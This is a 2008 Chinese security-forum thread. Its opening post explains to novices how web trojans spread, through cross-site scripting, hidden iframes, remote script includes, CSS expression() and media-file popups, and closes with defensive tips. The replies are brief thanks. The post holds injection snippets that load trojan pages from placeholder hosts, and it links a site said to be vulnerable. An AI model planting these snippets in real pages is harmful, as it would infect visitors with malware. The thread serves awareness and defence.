游客:  注册 | 登录 | 搜索 | 帮助
3s地带

3s地带 » 病毒救援 » 网页木马的传播方式(原创)


打印 | 推荐 | 订阅 | 收藏
标题: 网页木马的传播方式(原创)
cokeimuges
疾风
Rank: 4Rank: 4



UID 12337
精华 0
积分 421
帖子 197
现金 411
贡献值 0
阅读权限 40
注册 2007-11-7
楼主
发表于 2008-8-13 17:22 资料 个人空间 短消息 加为好友
网页木马的传播方式(原创)

网页木马的传播方式(原创)


写在文章之前,请大家不要因为文章稍长而不屑一顾,当你看完文章你也会些许了解网页病毒的
传播,为在网络中保护好自己的电脑起到一定的作用
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
大家也许都在想现在网络中的病毒越来越多,如何有效的避免中毒是大家共同的想法。
俗话说知己知彼才能百战百胜,对付病毒也一样,知道的它传播的方式就能更好的避免它!
现在我就来说说我所了解的网页木马传播的途径。

讲解网页挂马前,我先要让大家了解一下网页脚本漏洞的一些知识。

网页脚本漏洞之跨站漏洞
――――――――――――――――――――――――――――――
跨站漏洞攻击事目前脚本黑客下的一个主要攻击技术,跨站脚本是指在
远程WEB页面的Html代码中插入的具有恶意目的的数据,用户认为该页面是
可信赖的,但是但浏览器下载该页面时,嵌入其中的脚本被执行,有时候跨站脚本

被称为"XSS",这个是因为"CSS"一般称为分层样式表,如果你听某人提到XSS或CSS
安全漏洞,通常指的就是跨站漏洞了。
跨站漏洞的产生原因是由于程序员编写脚本的时候对一些变量
没有作出充分的过滤,直接把用户提交的数据送到SQL语句里
执行,这样用户可以提交一些特意构造的语句,一般都是带有
像javascript等这类脚本代码。在此基础上,黑客利用跨站输入
恶意脚本代码,但恶意的代码被执行后就形成了所谓的跨站攻击。
一般来说,对于人机交互比较搞的程序,比如论坛,留言板
这类程序都比较容易进行跨站攻击。利用跨站漏洞,黑客可以
在网页中插入任意代码,这些代码的功能包括获取网站管理员
或用户的cookie,隐蔽运行网页木马,甚至格式浏览者的硬盘,
只要脚本代码能够实现的功能,跨站攻击都能够达到,因此跨站
攻击的危害程度丝毫不亚于溢出攻击。
――――――――――――――――――――――――――――――

也许这样的理论对大家来说很难理解,通俗的说就是网页中特殊的字符没有经过过滤,后台未做处理后直接返回构成网页脚本代码输出。

演示如下
图1:
进入下面的网站你就会看到这样的效果:http://www.xinbaojixie.com/chinese/bbs/show.asp?id=233
PS:没有木马只是简单的测试

知道了跨站漏洞那就了解的网页挂马的本质,因为网页木马就是基于跨站漏洞所造成的。

接下来我就介绍网页挂马的几种基本方式。
1:html挂马:这个挂马方式是最简单过去利用最多的挂马方式
在网页中构造一条iframe语句即可,代码如下:
<iframe scr=http://www.xxxxxx.com/*.html width=0 height=0></iframe>
上面的http://www.xxxxxx.com/*.html地址即为html网页木马的地址,当用户打开浏览网页时,同时浏览网页木马。

2:js挂马:这个挂马方式可以说是比较隐藏的它里面的内容可以做加密处理
网页代码:<script src=http://www.xxxxxx.com/*.js></script>
里面的内容最普遍的就是document.write(‘http:\/\/www.xxxxxx.com\/*.html’);
http://www.xxxxxx.com/*.js这个就是调用的JS脚本而http:\/\/www.xxxxxx.com\/*.html这个就是被挂马的网页。
PS:\/是转义字符

3:css挂马:这个挂马方式用的比较少因为只能远程调控而本地不行。
方法是通过调用编写好的CSS层叠样式表,利用expression函数将CSS属性和javascript表达式关联起来组成跨站代码。

4:网页影音swf挂马:这个挂马方式是比较少见的,不过也不是没有。
制作swf文件的木马程序有很多,因为制作的方式比较简单只是在一个时间段那弹出带木马的网页即可
通过RealMedia Editor编辑即可,向视频中插入编写内容的文本文件,文件内容如下:
U 00:10:00 &&_repexternal&&http://xxxxxx.com/*.js(html、asp。。。。。。。。)

除了以上的网页挂马方式还有网页脚本病毒,这种病毒因破坏性强和编写简单而在过去被人所敬畏。
简单的说下网页脚本病毒中VBS脚本病毒的特点:1 编写简单 2破坏力大 3感染力强 4传播广
5 病毒代码容易获取变种繁多 6 欺骗性强==

网马的传播远不知这些,但是这些是最常见的,如何防止被这些木马所危害,最终要的就是打好补丁,不乱上一些不良网站,养成良好的上网习惯,勤查毒勤杀毒,别让病毒有可乘之机。


PS:文章很简单也很短高手默笑菜鸟请认真看完谢谢。

文章少许内容来自书籍和网络

转贴请注明出处360安全卫士BBS会员 des7791

顶部
mucbur
疾风
Rank: 4Rank: 4



UID 12377
精华 0
积分 382
帖子 352
现金 372
贡献值 0
阅读权限 40
注册 2007-11-7
沙发
发表于 2008-8-13 17:22 资料 个人空间 短消息 加为好友
我来学习了,支持下

  
顶部
zhihen-li
狂风
Rank: 5Rank: 5Rank: 5



UID 12637
精华 0
积分 593
帖子 563
现金 583
贡献值 0
阅读权限 50
注册 2007-11-7
板凳
发表于 2008-8-13 17:22 资料 个人空间 短消息 加为好友
我已经看完了,又了解和学习了,谢谢楼主提供分享了

顶部
uxlyzyy
疾风
Rank: 4Rank: 4



UID 12566
精华 0
积分 347
帖子 302
现金 337
贡献值 0
阅读权限 40
注册 2007-11-7
地毯
发表于 2008-8-13 17:22 资料 个人空间 短消息 加为好友
顶  本人是小菜

顶部
zhouhendun
狂风
Rank: 5Rank: 5Rank: 5



UID 12504
精华 0
积分 546
帖子 514
现金 536
贡献值 0
阅读权限 50
注册 2007-11-7
第5楼
发表于 2008-8-13 17:22 资料 个人空间 短消息 加为好友
学习啦!谢谢LZ


顶部
yuk101
疾风
Rank: 4Rank: 4



UID 12417
精华 0
积分 456
帖子 425
现金 446
贡献值 0
阅读权限 40
注册 2007-11-7
第6楼
发表于 2008-8-13 17:22 资料 个人空间 短消息 加为好友
i学习中~谢谢

顶部
hongjy
疾风
Rank: 4Rank: 4



UID 12360
精华 0
积分 339
帖子 309
现金 329
贡献值 0
阅读权限 40
注册 2007-11-7
第7楼
发表于 2008-8-13 17:22 资料 个人空间 短消息 加为好友
学习中。。。。。。。。。。。。。

顶部
bossbmh
疾风
Rank: 4Rank: 4



UID 12583
精华 0
积分 432
帖子 402
现金 422
贡献值 0
阅读权限 40
注册 2007-11-7
第8楼
发表于 2008-8-13 17:22 资料 个人空间 短消息 加为好友
学习 了  谢谢   楼主继续努力哦

顶部


 
当前时区 GMT+8, 现在时间是 2008-11-22 20:55 清除 Cookies - 联系我们 - 3S地带 - Archiver - WAP - 赣ICP备07006302号
Powered by Discuz! 5.5.0  © Processed in 0.033004 second(s), 6 queries , Gzip enabled 本论坛支付平台由支付宝提供 携手打造安全诚信的交易社区